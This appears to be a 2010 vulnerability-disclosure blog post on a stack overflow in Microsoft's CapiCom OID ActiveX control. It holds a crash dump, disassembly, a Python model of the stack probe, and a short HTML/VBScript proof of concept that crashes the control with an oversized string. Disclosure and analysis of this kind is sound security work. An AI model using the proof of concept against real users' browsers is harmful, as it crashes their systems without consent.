Friday, 2 July 2010

#1 - Microsoft CapiCom OID Class Remote Stack Overflow

------------------------------------------------------------------------------------------------------------------------------
INFO:
------------------------------------------------------------------------------------------------------------------------------
Platform: Microsoft Windows 7 Professional
6.1.7600 N/D build 7600

File: CapiCom.dll
Ver.: 2.1.0.2
ProgID: CAPICOM.OID.1
Descr.: OID Class
GUID: {7BF3AC5C-CC84-429A-ACA5-74D916AD6B8C}

MD5: 9130cce19b5db3d2e31f9f789263fc4a

Marked as: RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data

Description: The above file is vulnerable to a stack-based buffer overflow, triggered by assigning an overly long string to the "Value"
(Property Let Value As String) property.
This could compromise a user's system.
See below for a proof of concept.

Mitigation: Stack-canary protection (the ___security_cookie check visible in the prologue below) appears to be in place, which protects against arbitrary code execution (see below).

------------------------------------------------------------------------------------------------------------------------------
FAULTMON REPORT
------------------------------------------------------------------------------------------------------------------------------
16:22:24.639 pid=0A5C tid=0688 EXCEPTION (first-chance)
----------------------------------------------------------------
Exception C00000FD (STACK_OVERFLOW)
----------------------------------------------------------------
EAX=02BC2000: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=0224B1EC: 60 86 B0 60 86 B0 60 86-B0 60 86 B0 5E 86 AE 5E
EDX=07B40026: 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00
ESP=02DBCCF8: 5A 72 3F 75 B5 3C 14 63-5A 48 2A FC 78 CD DB 02
EBP=02DBCD28: 44 CD DB 02 C3 3E B8 75-44 0A 6A 05 24 00 B4 07
ESI=056A0A44: 2C 22 12 63 18 22 12 63-01 00 00 00 02 00 00 00
EDI=00B71B02: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=631517A7: 85 00 EB E9 CC CC CC CC-CC 68 10 18 15 63 64 FF
--> TEST [EAX],EAX
----------------------------------------------------------------

16:22:24.639 pid=0A5C tid=0688 EXCEPTION (unhandled)
----------------------------------------------------------------
Exception C00000FD (STACK_OVERFLOW)
----------------------------------------------------------------
EAX=02BC2000: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=0224B1EC: 60 86 B0 60 86 B0 60 86-B0 60 86 B0 5E 86 AE 5E
EDX=07B40026: 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00
ESP=02DBCCF8: 5A 72 3F 75 B5 3C 14 63-5A 48 2A FC 78 CD DB 02
EBP=02DBCD28: 44 CD DB 02 C3 3E B8 75-44 0A 6A 05 24 00 B4 07
ESI=056A0A44: 2C 22 12 63 18 22 12 63-01 00 00 00 02 00 00 00
EDI=00B71B02: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=631517A7: 85 00 EB E9 CC CC CC CC-CC 68 10 18 15 63 64 FF
--> TEST [EAX],EAX
----------------------------------------------------------------

16:22:25.877 pid=0A5C tid=08EC Thread exited with code 3221225725

------------------------------------------------------------------------------------------------------------------------------
SUBROUTINE
------------------------------------------------------------------------------------------------------------------------------
.text:0043177A align 10h
.text:00431780
.text:00431780 ; =============== S U B R O U T I N E =======================================
.text:00431780
.text:00431780
.text:00431780 __chkstk proc near ; CODE XREF: ATL::_ATL_SAFE_ALLOCA_IMPL::_Atlresetstkoflw(void)+32 p
.text:00431780 ; IPromptUser::GetDomainAndScheme(ushort *,ushort * *,INTERNET_SCHEME *)+A p ...
.text:00431780 push ecx
.text:00431781 lea ecx, [esp+4]
.text:00431785 sub ecx, eax
.text:00431787 sbb eax, eax
.text:00431789 not eax
.text:0043178B and ecx, eax
.text:0043178D mov eax, esp
.text:0043178F and eax, 0FFFFF000h
.text:00431794
.text:00431794 loc_431794: ; CODE XREF: __chkstk+29 j
.text:00431794 cmp ecx, eax
.text:00431796 jb short loc_4317A2
.text:00431798 mov eax, ecx
.text:0043179A pop ecx
.text:0043179B xchg eax, esp
.text:0043179C mov eax, [eax]
.text:0043179E mov [esp+0], eax
.text:004317A1 retn
.text:004317A2 ; ---------------------------------------------------------------------------
.text:004317A2
.text:004317A2 loc_4317A2: ; CODE XREF: __chkstk+16 j
.text:004317A2 sub eax, 1000h
.text:004317A7 test [eax], eax ; <-- CRASH OCCURS HERE
.text:004317A9 jmp short loc_431794
.text:004317A9 __chkstk endp
.text:004317A9
.text:004317A9 ; ---------------------------------------------------------------------------
.text:004317AB align 10h

------------------------------------------------------------------------------------------------------------------------------
STACK-CANARY PROTECTION (?)
------------------------------------------------------------------------------------------------------------------------------
.text:0041F281 arg_4 = dword ptr 0Ch
.text:0041F281 arg_8 = dword ptr 10h
.text:0041F281 arg_C = dword ptr 14h
.text:0041F281
.text:0041F281 mov edi, edi
.text:0041F283 push ebp
.text:0041F284 mov ebp, esp
.text:0041F286 mov eax, 1290h
.text:0041F28B call __chkstk
.text:0041F290 mov eax, ___security_cookie
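To make the SUBROUTINE listing and the crash dump easier to read together, here is an added Python model of the __chkstk probe loop (this is not code from the original post or from CapiCom.dll). It mirrors the listing instruction by instruction: ECX becomes ESP minus the requested size, EAX is walked down one page at a time, and each page is touched the way "test [eax], eax" does, so the first page below the thread's stack reservation faults inside __chkstk itself with exception C00000FD. The stack geometry (top address, 1 MiB reserve, 64 KiB commit, starting ESP) and the assumption that the PoC's 2,097,512-character BSTR is copied onto the stack as UTF-16 are constructed for the model; the 0x1290 frame size is the one passed to __chkstk in the STACK-CANARY listing.

```python
# Added example (not part of the original post): a Python model of the
# __chkstk stack-probe routine from the SUBROUTINE listing.  Stack geometry
# and allocation sizes below are constructed assumptions, not dump values.

PAGE = 0x1000
STATUS_STACK_OVERFLOW = 0xC00000FD


class StackOverflow(Exception):
    """Raised when a probe touches a page below the thread's stack reservation."""

    def __init__(self, address):
        super().__init__(f"Exception {STATUS_STACK_OVERFLOW:08X} (STACK_OVERFLOW) probing {address:08X}")
        self.address = address


class ThreadStack:
    """Minimal model of a Win32 thread stack: a reserved range whose top pages are
    committed; the page just below the committed region plays the guard page."""

    def __init__(self, top, reserve_bytes, commit_bytes, esp):
        self.limit = top - reserve_bytes          # lowest address the stack may ever reach
        self.committed_base = top - commit_bytes  # pages at/above this are committed
        self.esp = esp

    def touch(self, address):
        """Emulate the memory access of 'test [eax], eax' on one page."""
        page = address & ~(PAGE - 1)
        if page < self.limit:
            # No guard page left to commit: the kernel raises STATUS_STACK_OVERFLOW.
            raise StackOverflow(page)
        if page < self.committed_base:
            # Guard-page hit inside the reservation: commit it and move the guard down.
            self.committed_base = page


def chkstk(stack, eax):
    """Emulate __chkstk: EAX holds the number of bytes the caller wants on the
    stack.  Every page between the current ESP and the new ESP is touched in
    turn, so the first inaccessible page faults inside __chkstk itself.
    Returns (new_esp, list_of_probed_page_addresses)."""
    esp = stack.esp
    # lea ecx,[esp+4] / sub ecx,eax / sbb,not,and: ECX = ESP - EAX, clamped to 0
    # on unsigned underflow (the sbb/not/and trio implements the clamp).
    ecx = max(esp - eax, 0)
    # mov eax,esp / and eax,0FFFFF000h: EAX = base of the page ESP is on.
    eax_page = esp & 0xFFFFF000
    probed = []
    # loc_431794: cmp ecx,eax / jb loc_4317A2 -> keep probing while the target
    # still lies below the page most recently touched.
    while ecx < eax_page:
        eax_page -= PAGE          # sub eax, 1000h
        stack.touch(eax_page)     # test [eax], eax   <-- where the dump faults
        probed.append(eax_page)
    # mov eax,ecx / pop ecx / xchg eax,esp / ... / retn: ESP moves to the new frame.
    stack.esp = ecx
    return ecx, probed


def make_stack():
    """Constructed geometry (assumption): 1 MiB reserved, 64 KiB committed,
    ESP a little below the top of the reservation."""
    top = 0x02DC0000
    return ThreadStack(top, reserve_bytes=0x100000, commit_bytes=0x10000, esp=top - 0x100)


def probe_small_frame():
    """The 0x1290-byte frame of the /GS-protected function in the listing:
    a single page is probed and the call returns normally."""
    stack = make_stack()
    return chkstk(stack, 0x1290)


def probe_poc_frame():
    """A frame sized like the PoC's BSTR (2,097,512 UTF-16 code units, assumed
    to be copied onto the stack): the probes walk off the bottom of the
    reservation and the fault is raised inside __chkstk.  Returns the
    faulting probe address, or None if no fault occurred."""
    stack = make_stack()
    try:
        chkstk(stack, 2097512 * 2)
    except StackOverflow as exc:
        return exc.address
    return None


if __name__ == "__main__":
    new_esp, pages = probe_small_frame()
    print(f"0x1290-byte frame: new ESP={new_esp:08X}, pages probed={len(pages)}")
    print(f"PoC-sized frame: faulting probe address={probe_poc_frame():08X}")
```

The model matches what the FaultMon report shows: at the faulting instruction EAX (the address being probed) is roughly 2 MiB below ESP, which is exactly what a page-by-page walk that ran off the bottom of the stack looks like, and the exception is the kernel's STACK_OVERFLOW rather than an access violation on a return address. Because the fault fires during the probe, before the frame is ever used, the ___security_cookie check in the prologue is never reached for the oversized frame; for the normal 0x1290-byte frame the probe succeeds and the cookie is laid down as usual.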

------------------------------------------------------------------------------------------------------------------------------
PROOF OF CONCEPT
------------------------------------------------------------------------------------------------------------------------------
<html>
<object classid='clsid:7BF3AC5C-CC84-429A-ACA5-74D916AD6B8C' id='test'></object>
<script language = 'vbscript'>
buff = String(2097512, "A")
test.Value = buff
</script>
</html>
------------------------------------------------------------------------------------------------------------------------------
END
------------------------------------------------------------------------------------------------------------------------------
Today I want to share with you a useless(?) stack overflow and an investigation I'm doing on some functions.
Stay tuned...